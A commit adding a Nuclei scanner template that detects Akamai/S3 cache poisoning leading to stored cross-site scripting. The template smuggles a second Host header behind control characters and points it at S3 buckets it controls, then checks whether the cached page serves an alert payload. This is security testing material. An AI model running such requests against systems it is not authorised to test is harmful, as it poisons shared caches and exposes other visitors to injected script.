Create akamai-s3-cache-poisoning.yaml 🔥 (#6468)

* Create akamai-s3-cache-poisoning.yaml

* fix-lint

* misc update

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>

misconfiguration/akamai/akamai-s3-cache-poisoning.yaml

@@ -0,0 +1,64 @@
+id: akamai-s3-cache-poisoning
+
+info:
+  name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting
+  author: DhiyaneshDk
+  severity: high
+  reference:
+    - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
+    - https://owasp.org/www-community/attacks/Cache_Poisoning
+  metadata:
+    verified: "true"
+  tags: cache,poisoning,generic,xss,akamai,s3
+
+variables:
+  rand: "{{rand_base(5)}}"
+
+requests:
+  - raw:
+      - |+
+        GET /nuclei.svg?{{rand}}=x HTTP/1.1
+        Host: {{Hostname}}
+        {{escape}}Host: {{bucket}}
+
+      - |+
+        GET /nuclei.svg?{{rand}}=x HTTP/1.1
+        Host: {{Hostname}}
+
+    attack: clusterbomb
+    payloads:
+      escape:
+        - "\x0b"
+        - "\x0c"
+        - "\x1c"
+        - "\x1d"
+        - "\x1e"
+        - "\x1f"
+
+      bucket:
+        - "nuclei-ap-northeast-1"
+        - "nuclei-ap-northeast-2"
+        - "nuclei-ap-northeast-3"
+        - "nuclei-ap-south-1"
+        - "nuclei-ap-southeast-1"
+        - "nuclei-ap-southeast-2"
+        - "nuclei-ca-central-1"
+        - "nuclei-eu-central-1"
+        - "nuclei-eu-north-1"
+        - "nuclei-eu-west-1"
+        - "nuclei-eu-west-2"
+        - "nuclei-eu-west-3"
+        - "nuclei-sa-east-1"
+        - "nuclei-us-east-1"
+        - "nuclei-us-east-2"
+        - "nuclei-us-west-1"
+        - "nuclei-us-west-2"
+
+    stop-at-first-match: true
+    unsafe: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "alert(document.domain)")'
+          - 'status_code_2 == 200'
+        condition: and